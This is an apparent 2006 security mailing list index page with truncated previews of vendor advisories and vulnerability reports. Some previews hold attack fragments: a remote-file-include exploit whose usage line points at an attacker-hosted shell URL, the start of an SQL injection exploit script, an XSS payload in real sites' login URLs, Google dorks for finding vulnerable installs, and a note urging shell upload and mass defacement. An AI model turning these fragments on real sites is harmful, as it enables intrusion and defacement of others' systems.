-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-

Advisory Name: WebSense content filter b

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

======================================================================

Secunia Research 08/05/2006

- Anti-Trojan unacev2.dll Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software.....

[ more ]  [ reply ]

======================================================================

Secunia Research 08/05/2006

- TZipBuilder ZIP File Handling Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software..

[ more ]  [ reply ]

===========================================================
Ubuntu Security Notice USN-283-1 May 08, 2006
mysql-dfsg-4.1, mysql-dfsg vulnerabilities
CVE-2006-1516, CVE-2006-1517
===========================================================

A security issue affects the following Ubuntu releases

[ more ]  [ reply ]

===========================================================
Ubuntu Security Notice USN-282-1 May 08, 2006
nagios vulnerability
CVE-2006-2162
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)
Ubunt

[ more ]  [ reply ]

This was fixed in the recent security update (IPB.Blog 1.2.3) after an internal audit.

http://forums.invisionpower.com/index.php?showtopic=214248&view=getnewpo
st

[ more ]  [ reply ]

# Kurdish Security Advisory

# phpRaid Remote File Include [SMF] :}

# "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan

# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan (at) linuxmail (dot) org [email concealed]

# Risk : High

# Class : Remote

# Script : phpRaid

# Script

[ more ]  [ reply ]

# Kurdish Security Advisory

# phpRaid Remote File Include [PHPBB] :}

# "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan

# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan (at) linuxmail (dot) org [email concealed]

# Script : phpRaid

# Script Website : http://www.spiffyj

[ more ]  [ reply ]

INFIGO IS Security Advisory #ADV-2006-05-03
http://www.infigo.hr/

Title: Multiple FTP Servers vulnerabilities
Advisory ID: INFIGO-2006-05-03
Date: 2006-05-05
Advisory URL: http://www.infigo.hr/hr/in_focus/advisories/INFIGO-2006-05-03
Impact: Remote code exec

[ more ]  [ reply ]

SOFTWARE:

=========

singapore v0.9.7

DESCRIPTION:

============

The system is vulnerable to various XSS attacks

google dork : "Powered by singapore v0.9.7" inurl:index.php?gallery

429 results :)

xss code example

================

www.site.com/images/index.php?gallery=[gallery name

[ more ]  [ reply ]

#############
# Description
#############
# Vendor: http://www.claroline.net
# The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable
# clarolineRepositorySys in a include() function without being declared.
# There are other files vulnerable in the same folder, this exploit only
# at

[ more ]  [ reply ]

========================================================================

= CodeScan Advisory, codescan.com <advisories (at) codescan (dot) com [email concealed]>
=
= Multiple Vulnerabilities In IdealBB ASP Bulletin Board
=
= Vendor Website:
= http://www.idealscience.com
=
= Affected Version:
= Version 1.5.4a And Earlier
=

[ more ]  [ reply ]

#!/usr/bin/perl

############

# Dokeos Learning Management System 1.6.4 Remote File Include
# Exploit & Advisorie: beford <xbefordx gmail com>

#
# uso:# perl own.pl <host> <cmd-shell-url> <cmd-var>

# perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd
#

# cmd shell example: <?

[ more ]  [ reply ]

Title: CAID 34013 - CA Common Services CAIRIM on z/OS LMP SVC
vulnerability

CA Vulnerability ID: 34013

CA Advisory Date: 2006-05-02

Discovered By: IBM Global Services

Impact: Local attacker can gain escalated privileges.

Summary:
A potential vulnerability issue exists in our CAIRIM LMP
so

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1052-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
May 8th, 2006

[ more ]  [ reply ]

The security module(BankTown Client Control 1,4,2,51817)metioned above currently is not being used anymore.

For those who did not remove and still have it remained in their PCs, a new security patch has been released so that it is no longer vulnerable to those kinds of attacks.

[ more ]  [ reply ]

Summary:

---------------------------------------------------

AngelineCMS API (C) 2003-2004 AngelineCMS developers (angelinecms (at) pythonzero (dot) org [email concealed])

AngelineCMS API is a PHP framework which was developed for rapid development of AngelineCMS content management system.

AngelineCMS API is OPEN SOUR

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

ORIGINAL ADVISORY:

http://myimei.com/security/2006-05-07/mybb111email-verification-in-user-
activation-sql-injection-attack.html

??????-Summary?????-

Software: MyBB

Sowtware?s Web Site: http://www.mybboard.com

Versions: 1.1.1

Class: Remote

Status: Unpatched

Exploit: Available

Solution: A

[ more ]  [ reply ]

OpenEngine is a PHP based CMS.

The parameter "template" is not correctly checked, for this you can include other scripts which will be interpreted.

All actual versions are vulnerable (up to 1.8 Beta 2, which is the newest one), only the paths and consequences differ.

For example you can bro

[ more ]  [ reply ]

google dork : "Phil's Bookmark"

and lasth path add to "admin.php?edit=[item id]"

example: www.site.com/bookmarks/admin.php?edit=1

www.ayyildiz.org

[ more ]  [ reply ]

<pre>

[i] Limbo CMS (option=weblinks) sql injection exploit

[i] Cyber-Security.ORG | Security Advisory | Security Edithor by SnoB | Turkish hacking | security{!}

<?php

if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id'])))

{

?>

[*] Usage: <?echo htmlentities($PHP_

[ more ]  [ reply ]

google dork: inurl:x-poll

and add to /admin/images/add.php , upload to shell, and mass deface is server

www.ayyildiz.org

[ more ]  [ reply ]

Hey,

>I'm curious about why you regard this as security-relevant. I do not
>know what you mean by "log manipulation".

One possible attack vector would be to inject terminal emulator escape
sequences into the log file to leverage attacks against vulnerable
terminal emulator software. Let's say

[ more ]  [ reply ]

This is an URL Bug on 1ASPHost & DomainDLX Hosting Services Internet Sites :

We Can Run Script, META Tag Or HTML Code.

JScript

Example (1ASP Host) :

http://www.1asphost.com/MainLogin.aspx?error=<script>alert('HACKED%20!')
</script>

Example (DomainDLX)

http://www.domaindlx.com/MainL

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)

Date:

- -Written: 1.5.2006

- -Public: 5.5.2006

from SecurityReason.Com

CVE:

- - CVE-2006-2219 Full Path Disclosure

- - CVE-2006-2220 Sql Errors

[ more ]  [ reply ]